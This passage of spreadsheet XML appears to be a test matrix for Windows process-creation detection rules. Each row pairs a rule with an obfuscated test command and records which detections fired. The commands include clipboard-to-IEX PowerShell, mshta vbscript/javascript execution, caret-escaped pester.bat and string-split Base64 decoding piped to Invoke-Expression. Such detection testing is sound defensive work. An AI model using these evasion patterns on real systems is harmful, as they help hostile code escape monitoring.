        </is>
      </c>
      <c r="D1308" s="36" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1308" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1308" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1308" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1308" s="36" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1308" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1308" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1309" ht="15.75" customHeight="1" s="42">
      <c r="A1309" s="43" t="n"/>
      <c r="B1309" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1309" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1309" s="36" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1309" s="36" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp; mshta vbscript:CreateObject("WScript.Shell").Exec("%a%")(window.close)</t>
        </is>
      </c>
      <c r="F1309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1309" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1309" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions (cc7abbd0-762b-41e3-8a26-57ad50d2eea3)</t>
        </is>
      </c>
      <c r="J1309" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1309" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1310" ht="15.75" customHeight="1" s="42">
      <c r="A1310" s="43" t="n"/>
      <c r="B1310" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1310" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1310" s="36" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1310" s="36" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp;&amp; mshta javascript:a=new ActiveXObject("WScript.Shell");a.Run("%a%");window.close();</t>
        </is>
      </c>
      <c r="F1310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1310" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1310" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee); Wscript Shell Run In CommandLine (2c28c248-7f50-417a-9186-a85b223010ee)</t>
        </is>
      </c>
      <c r="J1310" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1310" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1311" ht="15.75" customHeight="1" s="42">
      <c r="A1311" s="43" t="n"/>
      <c r="B1311" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1311" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1311" s="36" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1311" s="36" t="inlineStr">
        <is>
          <t>set a=1 &amp;&amp; m^shta vbscript:createobject("WScript.Shell").run("calc.exe")(window.close)</t>
        </is>
      </c>
      <c r="F1311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1311" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1311" s="43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1311" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1311" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1312" ht="15.75" customHeight="1" s="42">
      <c r="A1312" s="43" t="n"/>
      <c r="B1312" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C1312" s="36" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D1312" s="36" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E1312" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F1312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1312" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1312" s="36" t="n"/>
      <c r="J1312" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1312" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1313" ht="15.75" customHeight="1" s="42">
      <c r="A1313" s="43" t="n"/>
      <c r="B1313" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C1313" s="36" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D1313" s="36" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E1313" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F1313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1313" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1313" s="43" t="n"/>
      <c r="J1313" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1313" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1314" ht="15.75" customHeight="1" s="42">
      <c r="A1314" s="43" t="n"/>
      <c r="B1314" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1314" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1314" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1314" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1314" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1314" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1314" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1314" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1314" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1315" ht="15.75" customHeight="1" s="42">
      <c r="A1315" s="43" t="n"/>
      <c r="B1315" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1315" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1315" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1315" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1315" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1315" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1315" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1315" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1316" ht="15.75" customHeight="1" s="42">
      <c r="A1316" s="43" t="n"/>
      <c r="B1316" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1316" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1316" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1316" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1316" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1316" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1316" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1316" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1317" ht="15.75" customHeight="1" s="42">
      <c r="A1317" s="43" t="n"/>
      <c r="B1317" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1317" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1317" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1317" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "$b64 = 'd2hvYW1p'; [System.Text.Encoding]::UTF8.GetString([System.Convert]::('F'+'romBase64S'+'tring').Invoke($b64)) | iex"</t>
        </is>
      </c>
      <c r="F1317" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1317" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1317" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J1317" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1317" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1318" ht="15.75" customHeight="1" s="42">
      <c r="A1318" s="43" t="n"/>
      <c r="B1318" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1318" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1318" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1318" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1318" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1318" s="43" t="n"/>
      <c r="J1318" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1318" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1319" ht="15.75" customHeight="1" s="42">
      <c r="A1319" s="43" t="n"/>
      <c r="B1319" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1319" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1319" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1319" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1319" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1319" s="36" t="n"/>
      <c r="J1319" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1319" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1320" ht="15.75" customHeight="1" s="42">
      <c r="A1320" s="43" t="n"/>
      <c r="B1320" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1320" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1320" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1320" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "$method = 'From' + 'Base64String'; $payload = [Convert]::$method('d2hvYW1p'); [System.Text.Encoding]::UTF8.GetString($payload) | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F1320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1320" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1320" s="36" t="n"/>
      <c r="J1320" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1320" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1321" ht="15.75" customHeight="1" s="42">
      <c r="A1321" s="43" t="n"/>
      <c r="B1321" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1321" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1321" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1321" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1321" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1321" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1321" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1321" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1321" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1321" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1322" ht="15.75" customHeight="1" s="42">
      <c r="A1322" s="43" t="n"/>
      <c r="B1322" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1322" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1322" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1322" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1322" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1322" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1322" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1322" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1322" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1323" ht="15.75" customHeight="1" s="42">
      <c r="A1323" s="43" t="n"/>
      <c r="B1323" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1323" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1323" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1323" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1323" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1323" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1323" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1323" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1323" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1323" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1324" ht="15.75" customHeight="1" s="42">
      <c r="A1324" s="43" t="n"/>
      <c r="B1324" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1324" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1324" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1324" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnD "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1324" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1324" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1324" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1324" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1324" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1324" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1325" ht="15.75" customHeight="1" s="42">
      <c r="A1325" s="43" t="n"/>
      <c r="B1325" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1325" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1325" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1325" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1325" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1325" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1325" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1325" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1325" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1326" ht="15.75" customHeight="1" s="42">
      <c r="A1326" s="43" t="n"/>
      <c r="B1326" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C1326" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D1326" s="36" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E1326" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F1326" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1326" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1326" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1326" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1326" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1326" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1327" ht="15.75" customHeight="1" s="42">
      <c r="A1327" s="43" t="n"/>
      <c r="B1327" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1327" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1327" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1327" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1327" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1327" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1327" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1327" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1327" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1327" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1328" ht="15.75" customHeight="1" s="42">
      <c r="A1328" s="43" t="n"/>
      <c r="B1328" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1328" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1328" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1328" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1328" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1328" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1328" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1328" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1328" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1328" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1329" ht="15.75" customHeight="1" s="42">
      <c r="A1329" s="43" t="n"/>
      <c r="B1329" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1329" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1329" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1329" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaNd "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1329" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1329" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1329" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1329" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1329" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1329" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1330" ht="15.75" customHeight="1" s="42">
      <c r="A1330" s="43" t="n"/>
      <c r="B1330" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1330" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1330" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1330" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1330" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1330" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1330" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1330" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1330" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1330" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1331" ht="15.75" customHeight="1" s="42">
      <c r="A1331" s="43" t="n"/>
      <c r="B1331" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1331" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1331" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1331" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1331" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1331" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1331" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1331" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1331" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1331" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1332" ht="15.75" customHeight="1" s="42">
      <c r="A1332" s="43" t="n"/>
      <c r="B1332" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
